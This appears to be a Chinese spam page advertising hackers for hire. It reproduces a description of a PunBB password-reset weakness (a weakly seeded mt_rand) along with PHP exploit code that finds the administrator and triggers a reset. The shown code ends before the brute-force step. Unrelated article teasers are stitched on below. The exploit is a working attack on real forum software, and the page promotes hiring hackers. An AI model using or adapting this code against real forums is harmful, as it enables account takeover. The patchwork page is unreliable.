怎么找 *** 黑客接单(24小时接单的黑客

访客4年前黑客资讯760

PunBB是一款基于PHP的论坛程序。 

PunBB的口令重置功能实现上存在漏洞,远程攻击者可能利用此漏洞在特定条件重置用户的口令。 
如果用户忘记了口令的话,可使用PunBB的口令重置功能重置。在请求口令重置后,论坛会向用户发送一封邮件,包含有一个新的随机口令以及激活链接,用户必须点击这个链接才能使口令更改生效。 
PunBB的口令重置功能使用mt_rand()生成新口令和激活链接,但在初始化马特赛特旋转演算法随机数生成器时使用了0到1,000,000之间的随机数,具体取决于当前的微秒,也就是只有100万个可能的新口令和激活链接。攻击者可以暴力猜测这个有限的区域,判断重置的口令并激活。 

<?php 
/** 
* Original : http://www.winshell.cn/2008-01.txt 
* Thanks to Stefan Esser, here's the exploit. 

* Team : EpiBite 
* firefox, petit-poney, thot 
* Nous tenons a remercier nos mamans et papas respectifs. 
* Let's get a fu*** coffee ! 
*/ 

// conf 
define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url 
define('EMAIL', 'login_x@epitech.net'); // your email 
define('LOGIN', 'login_x'); // your login 
define('PASS', '620553.8I73'); // your pass 
// Exploit 
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, 
URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
$s = curl_exec($h); 
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)', $s, $m); 
define('ADMIN', $m[2]); 
preg_match('/

([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m); 
if (count($m)) 
define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1])); 
else 
define('DATE', time() - 86400); //just in case, the forum or account just has been created 
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); 
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($h, CURLOPT_HEADER, 1); 
curl_setopt($h, CURLOPT_POST, 1); 
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 
'req_email='.urlencode(EMAIL), 
'request_pass=Envoyer'))); 
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m); 
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem) 
printf("Admin mail : %s\n--\n", ADMIN_MAIL); 

相关文章

伊泰克?二战波兰军队的棕熊佛伊泰克

伊泰克?二战波兰军队的棕熊佛伊泰克

伊泰克(二战波兰军队的棕熊佛伊泰克)童年从杂志书集上读到很多关于二战的故事,其中有一段:在这个世界上,动物有些时候是人类最好的朋友,本不应该介入人类战争的它们,但在机缘巧合下还是来到了炮火连天的战场,...

内网渗透随想

内网渗透随想

  之前看到微博有人私信我说内网渗透的技巧,zone也有很多小伙伴问了一些内网渗透的问题,所以我就斗胆写了这篇文章,有不对的,还请各位斧正   整个内网渗透肯定不是一篇两篇文章能够讲述清...

2020香港入关最新划定-2020香港入关要隔离吗-2020香港入关最新消息

很多人都出现异常喜爱去去香港购物,中国香港作为顾客的人间仙境一直都十分遭到顾客的偏爱,但是因为新冠肺炎肺部感染肺炎疫情,中国香港关闭了诸多港口,对于要想起中国香港探亲访友或者是要想要去去去香港购物的朋...

伊朗外长谴责美国非人陈嘉新老婆道制裁:给伊朗抗疫制造

  据伊朗卫生部最新数据,截至当地时间3日,伊朗单日新增新冠肺炎确诊病例13922例,新增死亡病例358例,累计确诊病例超过100万,达到1003494例,累计死亡病例为49348例。当天,伊朗外长扎...

黑客帝国无法超越(谁拒绝了黑客帝国)

黑客帝国无法超越(谁拒绝了黑客帝国)

本文目录一览: 1、为什么电影《黑客帝国》系列评价很高? 2、动作电影至今无法超越的大片,公路追逐枪战 3、星际旅行能否超越黑客帝国 4、你知道哪些“一直被模仿从未被超越”的经典作品?...

双核cpu是什么意思 cpu双核有什么好处?

cpu2核代表什么意思,cpu2核有哪些好处呢? 大伙儿配置电脑的情况下大部分全是挑选2核CPU了,可是这2核究竟是什么含意?你了解这种CPU的功效吗?下边我将为大伙儿系统软件的表述下:...